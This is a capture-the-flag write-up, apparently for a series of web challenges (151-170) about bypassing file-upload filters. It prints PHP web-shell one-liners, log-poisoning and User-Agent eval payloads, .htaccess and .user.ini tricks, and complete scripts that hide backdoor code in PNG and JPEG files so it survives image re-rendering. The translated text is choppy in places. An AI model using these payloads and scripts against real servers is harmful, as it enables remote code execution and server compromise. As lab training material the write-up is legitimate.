Getting started with the web - file upload
web151
Front-end verification
Modify the upload format to php, upload a sentence of horse, and the ant sword is connected to the flag
web152
Back-end verification
Upload a sentence, capture the png file,
modify the file name suffix to php, the access is parsed, and the ant sword is connected to the flag.
web153
Open and find that there is an index.php file under /upload, we can use .user.ini, please refer to the .htaccess and .user.ini configuration files Magic Use
PHP Manual - about php.ini configuration items,
remove the suffix restriction from the front end, and change accept to file ,Upload user.ini
Content-Type and change it to image/png
and upload 1.txt file can also succeed.
Ant sword connection gets flag.
web154
The method in the above question indicates that the content of the file is not compliant. It still doesn’t work if we add GIF89a to the file header. After some attempts...we found that php is filtered, so we use the short tag
Ant Sword to connect to the flag.
web155
It is still possible to follow the above method.
web156
It has been filtered on the basis of the previous one []
, and can be {}
replaced by .
web157
After filtering ;
and {
, direct command execution is fine
<?=`tac ../fl*`?>
web158
Same as above
<?=`tac ../fl*`?>
web159
still can
<?=`tac ../fl*`?>
web160
The log contains the bypass
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
First upload a .user.ini
file, then upload a txt
file, the content is to <?=include"/var/lo"."g/nginx/access.lo"."g"?>
take into account the filter log, and then the User-Agent is changed to <?php eval($_POST[1]);?>
the flag connected by Ant Sword.
web161
When uploading the ini file, add and GIF89A
modify the User-Agent to <?php eval($_POST[1]);?>
the flag of Ant Sword connection.
web162、web163
put this first...
web164
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'2.png'); //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
*/
?>
The script generates the image upload and executes the command Ctrl+S to download the file to get the flag.
web165
jpg image secondary rendering bypass
<?php
$miniPayload = "<?php system('tac f*');?>";
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
# 用法 php exp.php a.png
web166
The front end requires uploading in zip format, we can directly include a sentence
and modify the Content-Type toapplication/x-zip-compressed
web167
The topic prompts httpd to use .htaccess
to bypass
AddType application/x-httpd-php .png //将.png后缀的文件解析 成php
Then upload a picture that contains a sentence
Ant Sword is connected to the flag.
web168
Basic anti-kill
Upload png to capture the package, modify the file format to php, execute the command after the file
and find that the flag is in the upper directory, directly rce
web169
First upload an index.php, and then use the log to include, upload .user.ini
the UA to include a sentence, ant sword connection.
web170
Ditto.